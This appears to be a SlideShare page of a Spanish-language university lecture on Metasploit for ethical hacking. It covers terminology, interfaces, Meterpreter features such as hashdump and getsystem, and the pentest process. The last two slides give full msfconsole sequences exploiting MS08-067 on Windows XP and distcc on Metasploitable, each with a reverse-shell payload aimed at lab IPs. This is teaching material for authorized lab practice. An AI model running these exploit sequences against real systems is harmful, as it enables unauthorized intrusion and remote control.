SlideShare ist ein Scribd-Unternehmen logo
1 von 14
Downloaden Sie, um offline zu lesen
METASPLOIT
Cristian Alejandro Rojas
carojasq@correo.udistrital.edu.co
Universidad Distrital Francisco José de Caldas
Etapas del hacking ético
Qué es un test de penetración?
• Simulación de un ataque real
• Obtener una autorizaciónpara hacer el ataque
• Reportar al cliente los descubrimientos y
recomendaciones
• Encontrar y arreglar vulnerabilidadesantes de
que un atacante real las pueda explotar
Objetivos en el laboratorio
• Windows XP SP3
10.20…….
• Ubuntu Linux 8.04Metasploitable
10.20……
Terminologia
• Exploit: Vector para penetrar el sistema.
• Payload: Es la “bomba” que estalla una vez
está adentro del sistema.
• Encoder: Codificadordel payload.
• Shellcode: Un set de instrucciones usado
como payload.
• Listener: Escucha para una conexión entrante.
• Session: Conexión de un exploit exitoso
METASPLOIT
• Framework de explotación de vulnerabilidades
• Basado en Ruby
• Modular
• Exploits, Payloads, Auxiliaries.
Interfaces
• MSFconsole:Es la mas conocida, provee
acceso a la gran mayoría de las opciones del
framework. (Intecractiva).
Interfaces
• MSFCli: Sirve para correr un ataque
directamente desde la consola sin necesidad
de ser interactivo.
Utilidades
• MSFPayload:Es capaz de generar un
ejecutable con el payload solamente.
Interactuando con msfconsole
• use <module> - Configura el exploit a usar
• set <x X> - Configura un parametro
• setg <x X> - Define un parametro globalmente
• show <x> - Muestra un <x> (exploits, payloads,
options, etc)
• help <x> - Muestra ayuda acerca de X
• Info <module> muestra información acerca de un
módulo
• exploit – Ejecuta el módulo seleccionado.
Meterpreter
• Payload
• Nunca escribe en el disco, solo corre en
memoria.
• Provee comandos con funcionalidades
adicionales: help, background,ps, migrate,
getuid, download, upload,hashdump, shell.
• Facilita escalamiento de privilegios
(getsystem).
Metasploitable
• Ubuntu 8.08
• Entorno para practicar explotación de
vulnerabilidades
• Vulnerabilidades de sistema operativo y
también web.
Explotando una vulnerabilidad en
Windows XP SP3
• Ms08_67 -> Vulnerabilidad numero 67
reportada en 2008 aceptada por microsoft.
search windows/smb
info windows/smb/ms08_067_netapi
use windows/smb/ms08_067_netapi
show payloads
set payload windows/meterpreter/reverse_tcp
show options
set lhost 192.168.20.22
exploit
Explotando una vulnerabilidad en
metasploitable (Linux)
search distcc
use unix/misc/distcc_exec
show payloads
set payload cmd/unix/reverse
show options
set rhost 192.168.20.23
set lhost 192.168.20.102 (ip local)
exploit

Weitere ähnliche Inhalte

Was ist angesagt? (20)

Network scanning
Network scanningNetwork scanning
Network scanning
 
Metasploit framwork
Metasploit framworkMetasploit framwork
Metasploit framwork
 
Nmap Basics
Nmap BasicsNmap Basics
Nmap Basics
 
Bitlocker
BitlockerBitlocker
Bitlocker
 
Metasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner Class
 
Snort
SnortSnort
Snort
 
NMap
NMapNMap
NMap
 
Metasploit
MetasploitMetasploit
Metasploit
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptx
 
Metasploit
MetasploitMetasploit
Metasploit
 
Unidad 5 - Criptografía
Unidad 5 - CriptografíaUnidad 5 - Criptografía
Unidad 5 - Criptografía
 
MITRE ATT&CK Framework
MITRE ATT&CK FrameworkMITRE ATT&CK Framework
MITRE ATT&CK Framework
 
How MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsHow MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operations
 
Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenom
 
Secure Your Encryption with HSM
Secure Your Encryption with HSMSecure Your Encryption with HSM
Secure Your Encryption with HSM
 
Recon with Nmap
Recon with Nmap Recon with Nmap
Recon with Nmap
 
Introduction to Metasploit
Introduction to MetasploitIntroduction to Metasploit
Introduction to Metasploit
 
Introduction to filesystems and computer forensics
Introduction to filesystems and computer forensicsIntroduction to filesystems and computer forensics
Introduction to filesystems and computer forensics
 
Suricata
SuricataSuricata
Suricata
 
How to Test for The OWASP Top Ten
 How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten
 

Ähnlich wie Metasploit

Ethical hacking 01
Ethical hacking 01Ethical hacking 01
Ethical hacking 01Tensor
 
Ethical hacking 02
Ethical hacking 02Ethical hacking 02
Ethical hacking 02Tensor
 
Wordpress hardening (Campus Party Mexico 4)
Wordpress hardening (Campus Party Mexico 4)Wordpress hardening (Campus Party Mexico 4)
Wordpress hardening (Campus Party Mexico 4)hecky NeobitsOrg
 
Backbox Distribución deriva de Ubuntu
Backbox Distribución deriva de UbuntuBackbox Distribución deriva de Ubuntu
Backbox Distribución deriva de UbuntuJosé Moreno
 
Armitage pruebas
Armitage pruebasArmitage pruebas
Armitage pruebasTensor
 
AMENAZAS EN LA RED- METAPLOIT.pptx
AMENAZAS EN LA RED- METAPLOIT.pptxAMENAZAS EN LA RED- METAPLOIT.pptx
AMENAZAS EN LA RED- METAPLOIT.pptxHectorDeJesusTapiaGo
 
Memoria Pruebas de intrusion mediante Metasploit Framework
Memoria Pruebas de intrusion mediante Metasploit FrameworkMemoria Pruebas de intrusion mediante Metasploit Framework
Memoria Pruebas de intrusion mediante Metasploit FrameworkErlaitzParreoMuoz
 
Limahack 2010 - Creando exploits para GNU/Linux
Limahack 2010 - Creando exploits para GNU/LinuxLimahack 2010 - Creando exploits para GNU/Linux
Limahack 2010 - Creando exploits para GNU/LinuxMauricio Velazco
 
Metasploit - Bypass UAC fodhelper [Post-explotación]
Metasploit - Bypass UAC fodhelper [Post-explotación]Metasploit - Bypass UAC fodhelper [Post-explotación]
Metasploit - Bypass UAC fodhelper [Post-explotación]Adrián Lois
 
Los sistemas operativos
Los sistemas operativosLos sistemas operativos
Los sistemas operativospablito1103
 
Sistema operativo
Sistema operativoSistema operativo
Sistema operativoleonfeliz
 
Análisis Forense Memoria RAM
Análisis Forense Memoria RAMAnálisis Forense Memoria RAM
Análisis Forense Memoria RAMConferencias FIST
 
El sistema operativo
El sistema operativoEl sistema operativo
El sistema operativolavinusa
 
El sistema operativo
El sistema operativoEl sistema operativo
El sistema operativoAndrea_Huerga
 

Ähnlich wie Metasploit (20)

Ethical hacking 01
Ethical hacking 01Ethical hacking 01
Ethical hacking 01
 
Ethical hacking 02
Ethical hacking 02Ethical hacking 02
Ethical hacking 02
 
Virtual PC
Virtual PCVirtual PC
Virtual PC
 
Wordpress hardening (Campus Party Mexico 4)
Wordpress hardening (Campus Party Mexico 4)Wordpress hardening (Campus Party Mexico 4)
Wordpress hardening (Campus Party Mexico 4)
 
Backbox Distribución deriva de Ubuntu
Backbox Distribución deriva de UbuntuBackbox Distribución deriva de Ubuntu
Backbox Distribución deriva de Ubuntu
 
Metasploit v0.5
Metasploit v0.5Metasploit v0.5
Metasploit v0.5
 
Curso de Metasploit
Curso de MetasploitCurso de Metasploit
Curso de Metasploit
 
Atix26
Atix26Atix26
Atix26
 
Armitage pruebas
Armitage pruebasArmitage pruebas
Armitage pruebas
 
Cpods training-metasploit
Cpods training-metasploitCpods training-metasploit
Cpods training-metasploit
 
AMENAZAS EN LA RED- METAPLOIT.pptx
AMENAZAS EN LA RED- METAPLOIT.pptxAMENAZAS EN LA RED- METAPLOIT.pptx
AMENAZAS EN LA RED- METAPLOIT.pptx
 
Memoria Pruebas de intrusion mediante Metasploit Framework
Memoria Pruebas de intrusion mediante Metasploit FrameworkMemoria Pruebas de intrusion mediante Metasploit Framework
Memoria Pruebas de intrusion mediante Metasploit Framework
 
Slideshare
SlideshareSlideshare
Slideshare
 
Limahack 2010 - Creando exploits para GNU/Linux
Limahack 2010 - Creando exploits para GNU/LinuxLimahack 2010 - Creando exploits para GNU/Linux
Limahack 2010 - Creando exploits para GNU/Linux
 
Metasploit - Bypass UAC fodhelper [Post-explotación]
Metasploit - Bypass UAC fodhelper [Post-explotación]Metasploit - Bypass UAC fodhelper [Post-explotación]
Metasploit - Bypass UAC fodhelper [Post-explotación]
 
Los sistemas operativos
Los sistemas operativosLos sistemas operativos
Los sistemas operativos
 
Sistema operativo
Sistema operativoSistema operativo
Sistema operativo
 
Análisis Forense Memoria RAM
Análisis Forense Memoria RAMAnálisis Forense Memoria RAM
Análisis Forense Memoria RAM
 
El sistema operativo
El sistema operativoEl sistema operativo
El sistema operativo
 
El sistema operativo
El sistema operativoEl sistema operativo
El sistema operativo
 

Mehr von Cristian Alejandro Rojas Quintero (8)

Tipos de datos en R
Tipos de datos en RTipos de datos en R
Tipos de datos en R
 
Análisis de datos: R vs Python
Análisis de datos: R vs PythonAnálisis de datos: R vs Python
Análisis de datos: R vs Python
 
Desarrollo e implentación de una plataforma bioinformática para el análisis R...
Desarrollo e implentación de una plataforma bioinformática para el análisis R...Desarrollo e implentación de una plataforma bioinformática para el análisis R...
Desarrollo e implentación de una plataforma bioinformática para el análisis R...
 
Lenguaje de programación Ruby
Lenguaje de programación RubyLenguaje de programación Ruby
Lenguaje de programación Ruby
 
Tutorial freeradius + Mysql
Tutorial freeradius + MysqlTutorial freeradius + Mysql
Tutorial freeradius + Mysql
 
Nmap
NmapNmap
Nmap
 
High Performance Computing con Software libre
High Performance Computing con Software libreHigh Performance Computing con Software libre
High Performance Computing con Software libre
 
Hpc
HpcHpc
Hpc
 

Kürzlich hochgeladen

La muerte de El Senequita (Amadeo Martinez-Ingles).pdf
La muerte de El Senequita (Amadeo Martinez-Ingles).pdfLa muerte de El Senequita (Amadeo Martinez-Ingles).pdf
La muerte de El Senequita (Amadeo Martinez-Ingles).pdfPEPONLU
 
Vision de asignatura ESTRUCTURA DE DATOS.pptx
Vision de asignatura ESTRUCTURA DE DATOS.pptxVision de asignatura ESTRUCTURA DE DATOS.pptx
Vision de asignatura ESTRUCTURA DE DATOS.pptxjmatheus74
 
La busqueda de la relevancia en la economia (Harberger).pptx
La busqueda de la relevancia en la economia (Harberger).pptxLa busqueda de la relevancia en la economia (Harberger).pptx
La busqueda de la relevancia en la economia (Harberger).pptxPEPONLU
 
Mapa conceptual de el hardware y software
Mapa conceptual de el hardware y softwareMapa conceptual de el hardware y software
Mapa conceptual de el hardware y softwarejorgeadrianoropezame
 
CLASE 1 H.I.pptx,INFORMATICANIVEL AVANZADO
CLASE 1 H.I.pptx,INFORMATICANIVEL AVANZADOCLASE 1 H.I.pptx,INFORMATICANIVEL AVANZADO
CLASE 1 H.I.pptx,INFORMATICANIVEL AVANZADOMisolArticaSoto
 
PRESENTACION SISTEMAS OPERATIVOS MOVILES_20240424_235225_0000.pdf
PRESENTACION SISTEMAS OPERATIVOS MOVILES_20240424_235225_0000.pdfPRESENTACION SISTEMAS OPERATIVOS MOVILES_20240424_235225_0000.pdf
PRESENTACION SISTEMAS OPERATIVOS MOVILES_20240424_235225_0000.pdfSuleimaJimnez
 

Kürzlich hochgeladen (6)

La muerte de El Senequita (Amadeo Martinez-Ingles).pdf
La muerte de El Senequita (Amadeo Martinez-Ingles).pdfLa muerte de El Senequita (Amadeo Martinez-Ingles).pdf
La muerte de El Senequita (Amadeo Martinez-Ingles).pdf
 
Vision de asignatura ESTRUCTURA DE DATOS.pptx
Vision de asignatura ESTRUCTURA DE DATOS.pptxVision de asignatura ESTRUCTURA DE DATOS.pptx
Vision de asignatura ESTRUCTURA DE DATOS.pptx
 
La busqueda de la relevancia en la economia (Harberger).pptx
La busqueda de la relevancia en la economia (Harberger).pptxLa busqueda de la relevancia en la economia (Harberger).pptx
La busqueda de la relevancia en la economia (Harberger).pptx
 
Mapa conceptual de el hardware y software
Mapa conceptual de el hardware y softwareMapa conceptual de el hardware y software
Mapa conceptual de el hardware y software
 
CLASE 1 H.I.pptx,INFORMATICANIVEL AVANZADO
CLASE 1 H.I.pptx,INFORMATICANIVEL AVANZADOCLASE 1 H.I.pptx,INFORMATICANIVEL AVANZADO
CLASE 1 H.I.pptx,INFORMATICANIVEL AVANZADO
 
PRESENTACION SISTEMAS OPERATIVOS MOVILES_20240424_235225_0000.pdf
PRESENTACION SISTEMAS OPERATIVOS MOVILES_20240424_235225_0000.pdfPRESENTACION SISTEMAS OPERATIVOS MOVILES_20240424_235225_0000.pdf
PRESENTACION SISTEMAS OPERATIVOS MOVILES_20240424_235225_0000.pdf
 

Metasploit

  • 3. Qué es un test de penetración? • Simulación de un ataque real • Obtener una autorizaciónpara hacer el ataque • Reportar al cliente los descubrimientos y recomendaciones • Encontrar y arreglar vulnerabilidadesantes de que un atacante real las pueda explotar
  • 4. Objetivos en el laboratorio • Windows XP SP3 10.20……. • Ubuntu Linux 8.04Metasploitable 10.20……
  • 5. Terminologia • Exploit: Vector para penetrar el sistema. • Payload: Es la “bomba” que estalla una vez está adentro del sistema. • Encoder: Codificadordel payload. • Shellcode: Un set de instrucciones usado como payload. • Listener: Escucha para una conexión entrante. • Session: Conexión de un exploit exitoso
  • 6. METASPLOIT • Framework de explotación de vulnerabilidades • Basado en Ruby • Modular • Exploits, Payloads, Auxiliaries.
  • 7. Interfaces • MSFconsole:Es la mas conocida, provee acceso a la gran mayoría de las opciones del framework. (Intecractiva).
  • 8. Interfaces • MSFCli: Sirve para correr un ataque directamente desde la consola sin necesidad de ser interactivo.
  • 9. Utilidades • MSFPayload:Es capaz de generar un ejecutable con el payload solamente.
  • 10. Interactuando con msfconsole • use <module> - Configura el exploit a usar • set <x X> - Configura un parametro • setg <x X> - Define un parametro globalmente • show <x> - Muestra un <x> (exploits, payloads, options, etc) • help <x> - Muestra ayuda acerca de X • Info <module> muestra información acerca de un módulo • exploit – Ejecuta el módulo seleccionado.
  • 11. Meterpreter • Payload • Nunca escribe en el disco, solo corre en memoria. • Provee comandos con funcionalidades adicionales: help, background,ps, migrate, getuid, download, upload,hashdump, shell. • Facilita escalamiento de privilegios (getsystem).
  • 12. Metasploitable • Ubuntu 8.08 • Entorno para practicar explotación de vulnerabilidades • Vulnerabilidades de sistema operativo y también web.
  • 13. Explotando una vulnerabilidad en Windows XP SP3 • Ms08_67 -> Vulnerabilidad numero 67 reportada en 2008 aceptada por microsoft. search windows/smb info windows/smb/ms08_067_netapi use windows/smb/ms08_067_netapi show payloads set payload windows/meterpreter/reverse_tcp show options set lhost 192.168.20.22 exploit
  • 14. Explotando una vulnerabilidad en metasploitable (Linux) search distcc use unix/misc/distcc_exec show payloads set payload cmd/unix/reverse show options set rhost 192.168.20.23 set lhost 192.168.20.102 (ip local) exploit